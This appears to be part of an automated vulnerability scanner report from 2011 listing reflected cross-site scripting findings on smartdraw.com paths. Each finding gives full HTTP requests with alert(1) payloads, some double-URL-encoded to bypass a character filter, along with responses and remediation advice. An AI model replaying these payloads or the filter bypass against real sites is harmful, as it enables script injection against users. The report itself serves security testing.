GET /productc202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:44 GMT Content-Length: 8760 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/ Set-Cookie: ASP.NET_SessionId=yytjsqjo2ynqqa55mlvyit45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0 was submitted in the REST URL parameter 1. This input was echoed as a6214"style="x:expression(alert(1))"a8713ae88e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=g5orivnknoeu3mnalqm5ky2h; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8711 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e was submitted in the REST URL parameter 2. This input was echoed as e7026"style="x:expression(alert(1))"d34dba31b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/x22e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:53 GMT Content-Length: 8760 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: ASP.NET_SessionId=5ppvdnq4c02bbb55spc4py55; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a was submitted in the REST URL parameter 2. This input was echoed as 9a64e"style="x:expression(alert(1))"79d9addfb9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: ASP.NET_SessionId=4ccossevexhpky454jv13azr; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8739 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.39. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbd65"style="x:expression(alert(1))"a43b560b887 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/x22?fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/ Set-Cookie: ASP.NET_SessionId=k3dxer55b03zcg45gc2kh5b5; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.40. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 146c3"style="x:expression(alert(1))"5d5d2fc8c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/x22?146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: ASP.NET_SessionId=uaszcl55vdwks2faid1tcq45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1 was submitted in the REST URL parameter 2. This input was echoed as 80d8a"style="x:expression(alert(1))"b9c460ef3f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8774 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gvwmqnneobzhy02artx2kqbp; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f was submitted in the REST URL parameter 2. This input was echoed as a1cdd"style="x:expression(alert(1))"48d79440d3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/ Set-Cookie: ASP.NET_SessionId=b00pwu55pf2clt55u0k5o0rq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.43. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/diagram.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d74b"><script>alert(1)</script>7dda0913f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/diagram.asp/x22?8d74b"><script>alert(1)</script>7dda0913f6b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.44. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/diagram.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932a"><script>alert(1)</script>9f207111f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/diagram.asp/x22?f932a"><script>alert(1)</script>9f207111f3=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8 was submitted in the REST URL parameter 2. This input was echoed as 9b7f6"style="x:expression(alert(1))"722649758a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/ Set-Cookie: ASP.NET_SessionId=n40tt5554keayxr2thqf5345; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32 was submitted in the REST URL parameter 2. This input was echoed as fb652"style="x:expression(alert(1))"3dd903a5e32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: ASP.NET_SessionId=zbprv0455f2woe45n1vggnmm; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.47. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/floorplans.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43486"><script>alert(1)</script>d3e5d5a301c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/floorplans.asp/x22?43486"><script>alert(1)</script>d3e5d5a301c=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.48. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/floorplans.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86b"><script>alert(1)</script>3870aea577b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/floorplans.asp/x22?be86b"><script>alert(1)</script>3870aea577b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f was submitted in the REST URL parameter 2. This input was echoed as 77d5c"style="x:expression(alert(1))"e0eacf7515f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ivhntdeja4wz04jdiflpz5ap; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db was submitted in the REST URL parameter 2. This input was echoed as 3212f"style="x:expression(alert(1))"de74a7c05db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gfjqohyflklzjc3jlpnhf155; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.51. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/flowchart.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17f1"><script>alert(1)</script>da242985d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/flowchart.asp/x22?d17f1"><script>alert(1)</script>da242985d73=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.52. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/flowchart.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bdc"><script>alert(1)</script>30cb10048cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/flowchart.asp/x22?c5bdc"><script>alert(1)</script>30cb10048cf=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a was submitted in the REST URL parameter 3. This input was echoed as 5919c"style="x:expression(alert(1))"d2a7fce664a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
